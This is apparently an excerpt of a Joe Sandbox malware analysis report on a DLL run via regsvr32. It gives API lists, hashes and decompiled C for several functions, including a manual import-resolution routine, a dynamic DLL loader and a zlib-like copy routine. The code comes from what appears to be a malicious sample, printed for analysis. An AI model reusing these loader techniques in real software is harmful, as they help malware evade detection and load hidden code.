0x1000aafd
0x1000ab11
0x1000ab13
0x1000ab13
0x1000ab1b
0x1000ab23
0x1000ab24
0x1000ab29
0x1000ab32
0x1000ab52
0x1000ab52
0x1000ab5a
0x1000ab5d
0x1000ab65
0x00000000
0x1000ab65
0x1000ab3b
0x1000ab3f
0x00000000
0x00000000
0x1000ab47
0x00000000

APIs

memset.MSVCRT ref: 1000A9F4
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

Strings

D, xrefs: 1000AA4F

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateHeapPipe$AllocFreememset
String ID: D
API String ID: 488076629-2746444292
Opcode ID: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
Opcode Fuzzy Hash: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61

Uniqueness

Uniqueness Score: -1.00%

Function 1001249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1001249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E1000E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x100124a1
0x100124a9
0x100124be
0x100124d0
0x100124dc
0x100124e2
0x100124e7
0x100124f3
0x1001265e
0x00000000
0x1001265e
0x100124f9
0x10012502
0x10012510
0x10012513
0x10012522
0x10012522
0x10012529
0x10012537
0x1001253a
0x10012557
0x1001255e
0x1001256e
0x10012586
0x10012570
0x10012578
0x10012578
0x10012589
0x1001258d
0x10012599
0x1001259d
0x100125a1
0x100125a5
0x100125b1
0x100125dc
0x100125e4
0x100125f6
0x10012602
0x100125b3
0x100125b8
0x100125c3
0x100125cf
0x100125cf
0x1001260b
0x10012611
0x1001261b
0x10012637
0x1001261d
0x1001262c
0x1001262c
0x1001261b
0x1001263f
0x10012648
0x10012648
0x10012656
0x00000000
0x10012656
0x10012562
0x00000000
0x10012562
0x00000000
0x1001253a
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
LoadLibraryA.KERNEL32(00000000), ref: 10012551

Strings

GetProcAddress, xrefs: 100124C1
kernel32.dll, xrefs: 100124B3

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x1001e688; // 0x2de0590
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E100095E1(_t50, 0xb62);
					_t66 =  *0x1001e688; // 0x2de0590
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
					_t20 =  *0x1001e688; // 0x2de0590
					asm("sbb eax, eax");
					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x1001e688; // 0x2de0590
					_t68 = E100092E5(_t26 + 0x1020);
					_v12 = _t68;
					E100085D5( &_v8);
					_t32 =  *0x1001e688; // 0x2de0590
					_t34 = E100092E5(_t32 + 0x122a);
					 *0x1001e784 = _t34;
					_t35 =  *0x1001e684; // 0x2e5faa0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x1001e784);
					 *0x1001e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E1000E171(0x1001bb48, _t60);
					}
					 *0x1001e780 = _t38;
					E1000861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x1001e780 != 0) {
						goto L10;
					} else {
						E1000861A(0x1001e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x1001e780 == 0) {
						_t46 =  *0x1001e6bc; // 0x2e5fbc8
						 *0x1001e780 = _t46;
					}
					L10:
					return 1;
				}
			}

0x1000c4ce
0x1000c4ce
0x1000c4ce
0x1000c4d1
0x1000c4dd
0x1000c4e8
0x1000c504
0x1000c509
0x1000c512
0x1000c514
0x1000c51c
0x1000c53d
0x1000c542
0x1000c54f
0x1000c55a
0x1000c561
0x1000c568
0x1000c579
0x1000c57f
0x1000c582
0x1000c599
0x1000c5a5
0x1000c5ad
0x1000c5b4
0x1000c5ba
0x1000c5c6
0x1000c5cc
0x1000c5d3
0x1000c5e6
0x1000c5d5
0x1000c5d5
0x1000c5d8
0x1000c5de
0x1000c5e3
0x1000c5e8
0x1000c5f3
0x1000c605
0x1000c617
0x00000000
0x1000c619
0x1000c620
0x00000000
0x1000c626
0x1000c627
0x1000c627
0x1000c62e
0x1000c630
0x1000c635
0x1000c635
0x1000c63a
0x1000c63e
0x1000c63e

APIs

LoadLibraryW.KERNEL32 ref: 1000C5C6
memset.MSVCRT ref: 1000C605

Strings

%08x, xrefs: 1000C52F
dll, xrefs: 1000C588

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724

Uniqueness

Uniqueness Score: -1.00%

Function 10012D70, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E10012D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E10015D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E10014AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E10014C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E10014AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x10012d76
0x10012d7b
0x10012d7f
0x10012d82
0x10012d82
0x10012d85
0x10012d8a
0x10012d8f
0x10012d92
0x10012d97
0x10012d9a
0x10012da0
0x10012da0
0x10012dab
0x10012dae
0x10012db5
0x10012dba
0x00000000
0x00000000
0x10012dc0
0x10012dc5
0x10012dc5
0x10012dca
0x10012dd0
0x10012dda
0x10012ddf
0x10012de5
0x10012e04
0x10012e07
0x10012e12
0x10012e12
0x10012e12
0x10012e09
0x10012e09
0x10012e0b
0x00000000
0x10012e0d
0x10012e0d
0x10012e0d
0x10012e0b
0x10012e1a
0x10012e1f
0x10012e24
0x10012e2a
0x10012e2e
0x10012e31
0x10012e34
0x10012e3a
0x10012e3f
0x10012e42
0x10012e48
0x10012e4d
0x10012e53
0x10012e59
0x10012e5e
0x10012e61
0x10012e66
0x10012e6a
0x10012e6e
0x10012e71
0x10012e74
0x10012e7d
0x10012e84
0x10012e87
0x10012e8a
0x10012e8f
0x10012e94
0x10012e97
0x10012e9a
0x10012e9a
0x10012e9e
0x10012ea7
0x10012eae
0x10012eb1
0x10012eb6
0x10012ebb
0x10012ebb
0x10012ebe
0x10012ec3
0x00000000
0x00000000
0x10012de7
0x10012de9
0x10012df6
0x00000000
0x00000000
0x10012df6
0x10012de9
0x00000000
0x10012de5
0x10012ec9
0x10012ece
0x10012ed1
0x10012ed4
0x10012f7f
0x10012f7f
0x10012eda
0x10012eda
0x10012eda
0x10012edf
0x10012f09
0x10012f0c
0x10012f0c
0x10012f11
0x10012f13
0x10012f15
0x10012f18
0x10012f1b
0x10012f23
0x10012f28
0x10012f28
0x10012f2e
0x10012f31
0x10012f34
0x10012f37
0x10012f39
0x10012f39
0x10012f3a
0x10012f3a
0x10012f37
0x10012f48
0x10012f4b
0x10012f4f
0x10012f54
0x10012f57
0x10012f5a
0x10012f5a
0x10012f5a
0x10012f5d
0x10012f5d
0x10012f60
0x10012f60
0x10012ee1
0x10012ee1
0x10012ef1
0x10012ef4
0x10012ef9
0x10012ef9
0x10012efc
0x10012eff
0x10012f02
0x10012f04
0x10012f04
0x10012f63
0x10012f65
0x10012f68
0x10012f68
0x10012f6e
0x10012f72
0x10012f75
0x10012f77
0x10012f77
0x10012f88
0x10012f8a
0x10012f8a
0x10012f92
0x10012fa0
0x10012fa3
0x10012fa5
0x10012fc5
0x10012fc5
0x10012fc8
0x10012fce
0x10012fcf
0x10012fd2
0x10012fd4
0x10012fd7
0x10012fda
0x10012fdd
0x10012fe1
0x10012fe4
0x10012fe7
0x10012fea
0x10012fec
0x10012fec
0x10012fef
0x10012ff1
0x10012ff1
0x10012ff4
0x10012ff6
0x10012ff9
0x10013001
0x10013004
0x10013009
0x10013009
0x1001300f
0x10013012
0x10013015
0x10013017
0x10013017
0x10013018
0x10013018
0x10013023
0x10013023
0x10013023
0x10013026
0x10013029
0x10013029
0x1001302c
0x1001302c
0x10012fef
0x1001302f
0x10013032
0x10013035
0x10013037
0x1001303a
0x1001303c
0x1001303f
0x10013042
0x10013044
0x10013047
0x1001304f
0x10013057
0x1001305a
0x1001305a
0x1001305a
0x1001305d
0x1001305d
0x1001305d
0x10013060
0x10013066
0x10013068
0x10013068
0x1001306e
0x10013074
0x1001307d
0x10013084
0x10013086
0x10013089
0x10013089
0x1001308c
0x1001308c
0x1001308f
0x10013091
0x10013094
0x10013096
0x100130b1
0x100130b1
0x100130b5
0x100130b8
0x100130bb
0x100130be
0x100130d4
0x100130d4
0x100130d4
0x100130c0
0x100130c0
0x100130c2
0x100130c6
0x100130c9
0x00000000
0x100130cb
0x100130cb
0x100130cd
0x00000000
0x100130cf
0x100130cf
0x100130cf
0x100130cd
0x100130c9
0x100130d8
0x100130db
0x100130e0
0x100130ea
0x100130ea
0x100130ea
0x100130ed
0x10013098
0x10013098
0x1001309a
0x100130a1
0x100130a1
0x100130a3
0x100130a5
0x100130a7
0x100130ab
0x100130ad
0x100130af
0x00000000
0x00000000
0x100130af
0x100130ab
0x1001309c
0x1001309c
0x1001309f
0x00000000
0x00000000
0x1001309f
0x1001309a
0x100130f7
0x100130f9
0x100130f9
0x10013104
0x10012fa7
0x10012fa7
0x10012faa
0x00000000
0x10012fac
0x10012fac
0x10012fae
0x10012fb2
0x00000000
0x10012fb4
0x10012fb4
0x10012fb4
0x10012fb7
0x00000000
0x10012fbb
0x10012fc4
0x10012fc4
0x10012fb7
0x10012fb2
0x10012faa
0x10012f96
0x10012f9f
0x10012f9f

APIs

memcpy.MSVCRT ref: 10012E7D
memcpy.MSVCRT ref: 10012EF4
memcpy.MSVCRT ref: 10012F23
memcpy.MSVCRT ref: 10012F4F
memcpy.MSVCRT ref: 10013004

Part of subcall function 10015D90: memcpy.MSVCRT ref: 10015E6E

Part of subcall function 10014AF0: memcpy.MSVCRT ref: 10014B1A

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50

Uniqueness

Uniqueness Score: -1.00%

Function 10004D6D, Relevance: 6.4, APIs: 4, Instructions: 432
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
